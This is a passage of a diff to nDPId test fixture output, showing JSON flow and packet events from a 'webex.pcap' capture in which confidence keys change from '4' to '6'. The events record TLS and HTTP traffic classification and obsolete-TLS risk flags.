or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699074,"flow_last_seen":1444570699079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699079,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699096,"flow_last_seen":1444570699096,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699096,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1444570699096,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699096,"pkt":"ABoRAAACABoRAAABCABFAAA8731AAEAGBawKCAABTi7tW+lsAFBr3TT9AAAAAKACOQhjAgAAAgQFtAQCCAoATNuAAAAAAAEDAwY="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1444570699101,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699101,"pkt":"ABoRAAACABoRAAABCABFAAAoA2dAABAGIddOLu1bCggAAQBQ6WyUIssCa900\/lAS\/\/+AggAA"} 
@@ -254,17 +254,17 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1444570699106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699106,"pkt":"ABoRAAACABoRAAABCABFAAAoA2hAABAGIdZOLu1bCggAAQBQ6W3tNUJzEsq9jVAS\/\/+AgQAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAo735AAEAGBb8KCAABTi7tW+lsAFBr3TT+lCLLA1AQOQhHewAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAoZg1AAEAGjzAKCAABTi7tW+ltAFASyr2N7TVCdFAQOQhHegAA"} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699096,"flow_last_seen":1444570699201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1444570699201,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} -00849{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1243,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699096,"flow_last_seen":1444570699202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1444570699202,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699101,"flow_last_seen":1444570699212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570699212,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/applicationOpen","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} 
-01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1251,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699074,"flow_last_seen":1444570699636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1382,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1444570699636,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -01342{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1259,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1444570699074,"flow_last_seen":1444570699643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1444570699643,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"api.crittercism.com","server_names":"*.crittercism.com,crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL Wildcard, CN=*.crittercism.com","fingerprint":"68:8B:FC:77:1E:CA:80:33:0C:A9:0E:29:A6:E4:0D:FC:3A:AE:43:18"}} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699096,"flow_last_seen":1444570699201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1444570699201,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} +00849{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1243,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699096,"flow_last_seen":1444570699202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1444570699202,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699101,"flow_last_seen":1444570699212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570699212,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/applicationOpen","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} +01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1251,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699074,"flow_last_seen":1444570699636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1382,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1444570699636,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +01342{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1259,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1444570699074,"flow_last_seen":1444570699643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1444570699643,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","server_names":"*.crittercism.com,crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL Wildcard, CN=*.crittercism.com","fingerprint":"68:8B:FC:77:1E:CA:80:33:0C:A9:0E:29:A6:E4:0D:FC:3A:AE:43:18"}} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699916,"flow_last_seen":1444570699916,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699916,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1444570699916,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699916,"pkt":"ABoRAAACABoRAAABCABFAAA8M+lAAEAGPjwKCAABUEpuRIMPAbsBc+gmAAAAAKACOQj74QAAAgQFtAQCCAoATNvPAAAAAAEDAwY="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1444570699917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoA3lAABAGnsBQSm5ECggAAQG7gw\/+jBfZAXPoJ1AS\/\/9icAAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1444570699917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoM+pAAEAGPk8KCAABUEpuRIMPAbsBc+gn\/owX2lAQOQgpaQAA"} 
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699916,"flow_last_seen":1444570699968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699968,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1282,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699916,"flow_last_seen":1444570700123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700123,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
+00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699916,"flow_last_seen":1444570699968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699968,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1282,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699916,"flow_last_seen":1444570700123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700123,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570700561,"flow_last_seen":1444570700561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570700561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1444570700561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570700561,"pkt":"ABoRAAACABoRAAABCABFAAA8d7ZAAEAG+m4KCAABUEpuRIMRAbsN6aumAAAAAKACOQgrqQAAAgQFtAQCCAoATNwQAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1444570700563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700563,"pkt":"ABoRAAACABoRAAABCABFAAAoA4lAABAGnrBQSm5ECggAAQG7gxHyFlRZDemrp1AS\/\/9ibgAA"} 
@@ -273,28 +273,28 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1444570700565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoA4pAABAGnq9QSm5ECggAAQG7gxLZgCjIJn\/XOFAS\/\/9ibQAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1306,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAod7dAAEAG+oEKCAABUEpuRIMRAbsN6aun8hZUWlAQOQgpZwAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1307,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoCyZAAEAGZxMKCAABUEpuRIMSAbsmf9c42YAoyVAQOQgpZgAA"} -00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1308,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700561,"flow_last_seen":1444570700615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1310,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700563,"flow_last_seen":1444570700616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700616,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1312,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700561,"flow_last_seen":1444570700767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1313,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700563,"flow_last_seen":1444570700767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 